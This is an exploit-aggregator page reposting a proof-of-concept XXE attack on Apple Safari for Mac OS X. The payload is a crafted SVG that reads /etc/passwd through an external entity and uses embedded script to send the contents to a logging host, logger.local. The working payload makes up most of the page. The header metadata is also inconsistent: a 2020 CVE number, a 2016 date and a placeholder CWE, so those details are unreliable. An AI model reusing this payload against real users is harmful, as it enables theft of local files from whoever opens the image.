Apple Safari for Mac OS X SVG local XXE PoC

CVE	Category	Price	Severity
CVE-2020-9999	CWE-XX	$500	Critical

Author	Risk	Exploitation Type	Date
Exploit Researcher	High	Local	2016-07-05

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2016070019

Below is a copy:

Apple Safari for Mac OS X SVG local XXE PoCSafari for Mac OS X is prone to an XXE vulnerability when processing crafted SVG images. 
An attacker may use this vulnerability to steal files from local computer by tricking a user into opening and SVG image from a local location (ie USB key).
This vulnerability is mitigated by the file quarantine and do not work with downloaded files.

PoC:
------------------------------------------------
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg [  
<!ELEMENT svg ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg version="1.0" xmlns="http://www.w3.org/2000/svg" width="19000px" xmlns:xlink="http://www.w3.org/1999/xlink" >
<text x="-1000" y="-1000" >&xxe;</text>
<circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red" />
<script>
var logger = "http://logger.local/?file=" + encodeURIComponent(document.getElementsByTagName("text")[0].innerHTML);
document.createElementNS('http://www.w3.org/2000/svg','image').setAttributeNS('http://www.w3.org/1999/xlink','href', logger);

</script>

</svg>
------------------------------------------------

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum